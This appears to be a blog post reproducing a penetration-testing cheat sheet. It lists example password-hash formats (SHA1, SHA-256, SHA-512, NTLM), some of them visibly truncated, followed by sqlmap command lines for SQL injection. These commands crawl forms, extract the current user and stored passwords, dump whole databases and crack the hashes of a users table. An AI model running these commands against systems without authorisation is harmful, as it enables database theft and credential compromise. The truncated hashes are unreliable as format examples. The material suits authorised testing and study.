SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256 127e6fbfe24a750e72930c220a8e138275656b
SHA-256 $PASS:$SALT c73d08de890479518ed60cf670d17faa26a4a7
SHA-256 $SALT:$PASS eb368a2dfd38b405f014118c7d9747fcc97f4
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9
SHA-512 $PASS:$SALT e5c3ede3e49fb86592fb03f471c35ba13e8
SHA-512 $SALT:$PASS 976b451818634a1e2acba682da3fd6ef
NTLM Hash Example b4b9b02e6f09a9bd760f388b67351e2b

SQLMap Examples

sqlmap -u --forms --batch --crawl=10
--cookie=jsessionid=54321 --level=5 --risk=3
Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
Targeted sqlmap scan
sqlmap -u ""
--dbms=mysql --tech=U --random-agent --dump
Scan url for union + error based injection with mysql backend
and use a random user agent + database dump
sqlmap -o -u "" --forms sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms
-D database-name -T users --dump
sqlmap dump and crack hashes for table users on database-name.


Source:  &



Leave a Reply

Your email address will not be published. Required fields are marked *